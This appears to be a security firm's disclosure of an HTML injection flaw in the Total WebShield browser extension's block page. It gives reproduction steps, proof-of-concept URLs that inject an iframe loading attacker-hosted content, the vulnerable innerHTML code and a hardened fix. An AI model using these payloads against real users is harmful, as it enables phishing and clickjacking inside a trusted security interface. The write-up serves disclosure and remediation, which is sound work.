Self‑HTML Injection in Total WebShield (Chrome Extension v3.2)

TL;DR:
Total WebShield (v3.2) fails to sanitize the category URL‑parameter in its block page, allowing an attacker to inject arbitrary HTML into the extension’s UI. This can be abused to load remote content, phish users, or execute scripts in the context of the extension’s blocked‑page UI.

Steps to Reproduce:

  1. Install the extension and enable Total WebShield.

  2. Visit any URL classified as malicious (e.g. ?category=malware).

  3. Observe the block page with a reflected category label.

  4. Construct a URL with category set to an encoded HTML iframe:

     ?category=%3Ciframe%20src=%22http://attacker.com/test.html%22%20%20%3E%20%3C/iframe%3E%20malware&url=BLANK&backStepCount=2

  5. The injected iframe appears in the block page UI, rendering external content.


Introduction

Total WebShield, the URL‑blocking extension offered by TotalAV, displays a block page when it intercepts malicious or low‑trust websites. The category parameter in the block page URL reflects payloads directly into the HTML without any input sanitization or output encoding. This allows arbitrary HTML injection, including iframe embedding, leading to an attacker‑controlled page being rendered within the extension context.

After installation, when Total WebShield blocks a site (e.g. for malware, phishing), it redirects the browser to an internal HTML page:

chrome-extension://bobjajapamhdnbnimmaddcceeckkoiff/app/webshield/index.html?category=malware&url=http%3A%2F%2Fmaliciouswebsitetest.com%2F&backStepCount=2


Vulnerability Details

  1. Root Cause

    The extension reads the category parameter from location.search, and writes it directly into the page’s inner HTML without any escaping or sanitization.

  2. Injection Point

    In index.html (or its associated JavaScript), the rendering logic looks something like this (the untrusted query value flows straight into an HTML sink):

     // Read the attacker-controllable query string of the block page
     const params = new URLSearchParams(window.location.search);
     const category = params.get('category') || 'unknown';
     // innerHTML parses the value as markup; no escaping or validation is applied
     document.querySelector('#category-label').innerHTML = category;

    Thus, any HTML in category is rendered unescaped.

  3. Proof of Concept (PoC)

    Visit a “blocked page” URL crafted as follows:

     chrome-extension://bobjajapamhdnbnimmaddcceeckkoiff/app/webshield/index.html?category=%3Ciframe%20src=%22http://192.168.58.192/test.html%22%20%20%3E%20%3C/iframe%3E%20malware&url=BLANK&backStepCount=2

    Evidence from the attacker‑hosted iframe confirming the injection:

    • The block page displays the attacker’s iframe inline inside the extension.

    • This content is indistinguishable from legitimate UI content.

    • It does not trigger any alert or error in the browser.

  4. Impact

    This vulnerability opens the door to several types of abuse:

    • Phishing / social engineering: Display fake messages to trick users.

    • Clickjacking: Overlay misleading buttons or fake "Visit anyway" options.

    • Brand impersonation: Mimic official security messages or forms.

    • Potential escalation: While this is not a direct XSS vulnerability, combining it with other extension bugs could lead to code execution or privilege escalation.

Though <script> tags are not executed (due to CSP), arbitrary HTML tags like <iframe>, <img>, or even <style> are rendered as part of the DOM, which is enough for advanced manipulation or deception.


Recommendation

To fix this issue, the developers should:

  • Sanitize and escape all user-controlled input before inserting it into the DOM.

  • Replace .innerHTML assignments with .textContent where applicable.

  • Validate that the category parameter only contains expected values (e.g. "malware", "phishing", etc.).

  • Consider implementing a Content Security Policy (CSP) that restricts unsafe rendering behaviors.
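The following is an added example, not code from Total WebShield or TotalAV, showing how the injection point described under "Vulnerability Details" would look once the recommendations above are applied: the category value is validated against an allowlist before it is used, the label is written with textContent instead of innerHTML, and an escaping helper is provided for any place where an HTML sink genuinely cannot be avoided. The element id "category-label" is taken from the write-up; the allowlist entries, the label table, the function names and the sample query strings are assumptions made for this example.

```javascript
// Added example (not the extension's own code): hardened rendering of the
// block page's category label. Assumes an element with id "category-label"
// exists; all other names and values are illustrative.

// Only values the block page actually knows how to describe are accepted.
const ALLOWED_CATEGORIES = new Set(['malware', 'phishing', 'scam', 'unknown']);

// Map an untrusted query string to a known category. Anything outside the
// allowlist collapses to 'unknown', so attacker-supplied markup never reaches
// the DOM at all, whatever sink is used later.
function resolveCategory(search) {
  const params = new URLSearchParams(search);
  const raw = (params.get('category') || '').trim().toLowerCase();
  return ALLOWED_CATEGORIES.has(raw) ? raw : 'unknown';
}

// Human-readable labels live in code, not in the URL (constructed for this example).
const LABELS = {
  malware: 'Malware',
  phishing: 'Phishing',
  scam: 'Scam',
  unknown: 'Unsafe website',
};

// Write the label with textContent so the browser treats it purely as text.
// `labelElement` is any object with a textContent property: a DOM element in
// the extension, or a plain object when run outside a browser.
function renderCategory(search, labelElement) {
  const category = resolveCategory(search);
  labelElement.textContent = LABELS[category];
  return category;
}

// Defence in depth: for the rare case where a fragment must be built with
// innerHTML, escape the characters that can open a tag or break an attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Constructed inputs: a benign block-page query and the payload shape from the
// write-up, with the remote host replaced by a placeholder.
const BENIGN_QUERY = '?category=malware&url=BLANK&backStepCount=2';
const HOSTILE_QUERY =
  '?category=%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2F%22%3E%3C%2Fiframe%3E%20malware' +
  '&url=BLANK&backStepCount=2';

// Stand-alone demonstration when no browser DOM is available.
if (typeof document === 'undefined') {
  const fakeLabel = { textContent: '' };
  renderCategory(HOSTILE_QUERY, fakeLabel);
  console.log(fakeLabel.textContent); // "Unsafe website": the iframe payload never renders
  console.log(escapeHtml('<iframe src="x">')); // &lt;iframe src=&quot;x&quot;&gt;
}
```

In the extension itself the call would be `renderCategory(window.location.search, document.querySelector('#category-label'))`. The allowlist is the primary control: once only known category names can reach the rendering code, the choice of sink no longer decides whether injection is possible, and textContent plus the escaping helper simply remove the remaining ways for a future change to reintroduce the bug.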


Lessons Learned

Even browser extensions built for security can contain serious security bugs themselves. UI injection, even without JavaScript execution, can be dangerous in the right context.

Always validate and escape any untrusted data that touches the DOM, especially in extensions that run with high privileges and interact with the user directly.

Written by

FPT Metrodata Indonesia

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.